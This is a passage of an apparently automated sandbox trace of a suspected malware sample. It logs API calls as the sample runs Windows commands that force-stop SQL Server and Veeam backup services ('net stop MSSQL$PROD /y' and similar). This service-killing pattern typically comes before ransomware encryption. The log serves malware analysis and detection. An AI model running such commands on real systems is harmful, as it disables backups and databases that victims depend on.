lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0xffba5750, lpcchBuffer=0xefda8 | out: lpServiceName="", lpcchBuffer=0xefda8) returned 0 [0120.844] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0120.844] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0120.844] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.844] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.844] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.844] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.844] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0120.844] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.844] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.844] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0120.845] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0120.845] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0120.845] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0120.845] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.845] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.845] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0120.845] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0120.845] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0120.845] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0120.845] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0xefdb0 | out: bufptr=0xefdb0) returned 0x889 [0120.845] wcscpy_s (in: _Destination=0xffba80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.845] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0120.846] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.848] GetFileType (hFile=0xb) returned 0x2 [0120.848] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc78 | out: lpMode=0xefc78) returned 1 [0120.849] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefc70, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0xefc70*=0x1e) returned 1 [0120.849] GetFileType (hFile=0xb) returned 0x2 [0120.849] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc78 | out: lpMode=0xefc78) returned 1 [0120.849] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc70, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0xefc70*=0x2) returned 1 [0120.850] _ultow (in: _Dest=0x889, _Radix=982240 | out: _Dest=0x889) returned="2185" [0120.850] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.850] GetFileType (hFile=0xb) returned 0x2 [0120.850] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc78 | out: lpMode=0xefc78) returned 1 [0120.850] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefc70, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0xefc70*=0x34) returned 1 [0120.850] GetFileType (hFile=0xb) returned 0x2 [0120.850] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefc78 | out: lpMode=0xefc78) returned 1 [0120.851] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefc70, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0xefc70*=0x2) returned 1 [0120.851] NetApiBufferFree (Buffer=0x174d60) returned 0x0 [0120.851] NetApiBufferFree (Buffer=0x17c130) returned 0x0 [0120.851] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0120.851] exit (_Code=2) Process: id = "372" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x7816c000" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xbf4" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13029 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13030 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13031 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13032 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13033 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13034 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13035 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13036 start_va = 0xffb80000 end_va = 0xffbb2fff entry_point = 0xffb80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13037 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13038 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13039 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 13040 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13041 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13042 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13043 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 13044 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13045 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13046 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13047 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13048 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13049 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 13050 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 13051 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13052 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13053 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13054 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13055 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13056 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13057 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13058 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13059 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13060 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13061 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13062 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13063 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13064 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13065 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13066 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13086 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 916 os_tid = 0xe8c [0120.943] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefe50 | out: lpSystemTimeAsFileTime=0xefe50*(dwLowDateTime=0xfd354010, dwHighDateTime=0x1d48689)) [0120.943] GetCurrentProcessId () returned 0xe00 [0120.943] GetCurrentThreadId () returned 0xe8c [0120.943] GetTickCount () returned 0x27e05 [0120.943] QueryPerformanceCounter (in: lpPerformanceCount=0xefe58 | out: lpPerformanceCount=0xefe58*=1816786100000) returned 1 [0120.944] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0120.944] __set_app_type (_Type=0x1) [0120.944] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb99c9c) returned 0x0 [0120.944] __getmainargs (in: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788, _DoWildCard=0, _StartInfo=0xffba479c | out: _Argc=0xffba4780, _Argv=0xffba4790, _Env=0xffba4788) returned 0 [0120.944] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.944] GetConsoleOutputCP () returned 0x1b5 [0120.944] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffbacec0 | out: lpCPInfo=0xffbacec0) returned 1 [0120.944] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0120.946] sprintf_s (in: _DstBuf=0xefdf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.946] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.947] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.947] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0120.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefb90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0120.948] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.948] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefde8 | out: Buffer=0xefde8*=0x214d60) returned 0x0 [0120.948] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefde8 | out: Buffer=0xefde8*=0x21c130) returned 0x0 [0120.948] _fileno (_File=0x7fefdba2a80) returned 0 [0120.948] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0120.948] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.948] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.948] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.948] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.948] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.948] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.948] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.948] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.948] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.948] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.948] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.948] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.948] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.948] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.948] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.948] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.949] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.949] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.949] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.949] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.949] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.949] _wcsicmp (_String1="accounts", _String2="VeeamHvIntegrationSvc") returned -21 [0120.949] _wcsicmp (_String1="computer", _String2="VeeamHvIntegrationSvc") returned -19 [0120.949] _wcsicmp (_String1="config", _String2="VeeamHvIntegrationSvc") returned -19 [0120.949] _wcsicmp (_String1="continue", _String2="VeeamHvIntegrationSvc") returned -19 [0120.949] _wcsicmp (_String1="cont", _String2="VeeamHvIntegrationSvc") returned -19 [0120.949] _wcsicmp (_String1="file", _String2="VeeamHvIntegrationSvc") returned -16 [0120.949] _wcsicmp (_String1="files", _String2="VeeamHvIntegrationSvc") returned -16 [0120.949] _wcsicmp (_String1="group", _String2="VeeamHvIntegrationSvc") returned -15 [0120.949] _wcsicmp (_String1="groups", _String2="VeeamHvIntegrationSvc") returned -15 [0120.949] _wcsicmp (_String1="help", _String2="VeeamHvIntegrationSvc") returned -14 [0120.949] _wcsicmp (_String1="helpmsg", _String2="VeeamHvIntegrationSvc") returned -14 [0120.949] _wcsicmp (_String1="localgroup", _String2="VeeamHvIntegrationSvc") returned -10 [0120.949] _wcsicmp (_String1="pause", _String2="VeeamHvIntegrationSvc") returned -6 [0120.949] _wcsicmp (_String1="session", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="sessions", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="sess", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="share", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="start", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="stats", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="statistics", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="stop", _String2="VeeamHvIntegrationSvc") returned -3 [0120.949] _wcsicmp (_String1="time", _String2="VeeamHvIntegrationSvc") returned -2 [0120.949] _wcsicmp (_String1="user", _String2="VeeamHvIntegrationSvc") returned -1 [0120.949] _wcsicmp (_String1="users", _String2="VeeamHvIntegrationSvc") returned -1 [0120.949] _wcsicmp (_String1="msg", _String2="VeeamHvIntegrationSvc") returned -9 [0120.949] _wcsicmp (_String1="messenger", _String2="VeeamHvIntegrationSvc") returned -9 [0120.949] _wcsicmp (_String1="receiver", _String2="VeeamHvIntegrationSvc") returned -4 [0120.949] _wcsicmp (_String1="rcv", _String2="VeeamHvIntegrationSvc") returned -4 [0120.949] _wcsicmp (_String1="netpopup", _String2="VeeamHvIntegrationSvc") returned -8 [0120.949] _wcsicmp (_String1="redirector", _String2="VeeamHvIntegrationSvc") returned -4 [0120.949] _wcsicmp (_String1="redir", _String2="VeeamHvIntegrationSvc") returned -4 [0120.949] _wcsicmp (_String1="rdr", _String2="VeeamHvIntegrationSvc") returned -4 [0120.950] _wcsicmp (_String1="workstation", _String2="VeeamHvIntegrationSvc") returned 1 [0120.950] _wcsicmp (_String1="work", _String2="VeeamHvIntegrationSvc") returned 1 [0120.950] _wcsicmp (_String1="wksta", _String2="VeeamHvIntegrationSvc") returned 1 [0120.950] _wcsicmp (_String1="prdr", _String2="VeeamHvIntegrationSvc") returned -6 [0120.950] _wcsicmp (_String1="devrdr", _String2="VeeamHvIntegrationSvc") returned -18 [0120.950] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamHvIntegrationSvc") returned -10 [0120.950] _wcsicmp (_String1="server", _String2="VeeamHvIntegrationSvc") returned -3 [0120.950] _wcsicmp (_String1="svr", _String2="VeeamHvIntegrationSvc") returned -3 [0120.950] _wcsicmp (_String1="srv", _String2="VeeamHvIntegrationSvc") returned -3 [0120.950] _wcsicmp (_String1="lanmanserver", _String2="VeeamHvIntegrationSvc") returned -10 [0120.950] _wcsicmp (_String1="alerter", _String2="VeeamHvIntegrationSvc") returned -21 [0120.950] _wcsicmp (_String1="netlogon", _String2="VeeamHvIntegrationSvc") returned -8 [0120.950] _wcsupr (in: _String="VeeamHvIntegrationSvc" | out: _String="VEEAMHVINTEGRATIONSVC") returned="VEEAMHVINTEGRATIONSVC" [0120.950] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce40 [0121.033] GetServiceKeyNameW (in: hSCManager=0x21ce40, lpDisplayName="VEEAMHVINTEGRATIONSVC", lpServiceName=0xffba5750, lpcchBuffer=0xefd08 | out: lpServiceName="", lpcchBuffer=0xefd08) returned 0 [0121.034] _wcsicmp (_String1="msg", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0121.034] _wcsicmp (_String1="messenger", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0121.034] _wcsicmp (_String1="receiver", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0121.034] _wcsicmp (_String1="rcv", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0121.034] _wcsicmp (_String1="redirector", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0121.034] _wcsicmp (_String1="redir", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0121.034] _wcsicmp (_String1="rdr", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0121.035] _wcsicmp (_String1="workstation", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0121.035] _wcsicmp (_String1="work", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0121.035] _wcsicmp (_String1="wksta", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0121.035] _wcsicmp (_String1="prdr", _String2="VEEAMHVINTEGRATIONSVC") returned -6 [0121.035] _wcsicmp (_String1="devrdr", _String2="VEEAMHVINTEGRATIONSVC") returned -18 [0121.035] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0121.035] _wcsicmp (_String1="server", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0121.035] _wcsicmp (_String1="svr", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0121.035] _wcsicmp (_String1="srv", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0121.035] _wcsicmp (_String1="lanmanserver", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0121.035] _wcsicmp (_String1="alerter", _String2="VEEAMHVINTEGRATIONSVC") returned -21 [0121.035] _wcsicmp (_String1="netlogon", _String2="VEEAMHVINTEGRATIONSVC") returned -8 [0121.035] NetServiceControl (in: servername=0x0, service="VEEAMHVINTEGRATIONSVC", opcode=0x0, arg=0x0, bufptr=0xefd10 | out: bufptr=0xefd10) returned 0x889 [0121.035] wcscpy_s (in: _Destination=0xffba80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0121.035] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0121.036] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0121.038] GetFileType (hFile=0xb) returned 0x2 [0121.038] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbd8 | out: lpMode=0xefbd8) returned 1 [0121.038] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefbd0, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0xefbd0*=0x1e) returned 1 [0121.038] GetFileType (hFile=0xb) returned 0x2 [0121.039] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbd8 | out: lpMode=0xefbd8) returned 1 [0121.039] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefbd0, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0xefbd0*=0x2) returned 1 [0121.039] _ultow (in: _Dest=0x889, _Radix=982080 | out: _Dest=0x889) returned="2185" [0121.039] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffba5b50, nSize=0x800, Arguments=0xffba7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0121.039] GetFileType (hFile=0xb) returned 0x2 [0121.039] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbd8 | out: lpMode=0xefbd8) returned 1 [0121.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffba5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefbd0, lpReserved=0x0 | out: lpBuffer=0xffba5b50*, lpNumberOfCharsWritten=0xefbd0*=0x34) returned 1 [0121.040] GetFileType (hFile=0xb) returned 0x2 [0121.040] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbd8 | out: lpMode=0xefbd8) returned 1 [0121.040] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefbd0, lpReserved=0x0 | out: lpBuffer=0xffb81efc*, lpNumberOfCharsWritten=0xefbd0*=0x2) returned 1 [0121.041] NetApiBufferFree (Buffer=0x214d60) returned 0x0 [0121.041] NetApiBufferFree (Buffer=0x21c130) returned 0x0 [0121.041] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0121.041] exit (_Code=2) Process: id = "373" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x10ea000" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13067 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13068 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13069 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13070 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13071 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13072 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13073 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13074 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13075 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id 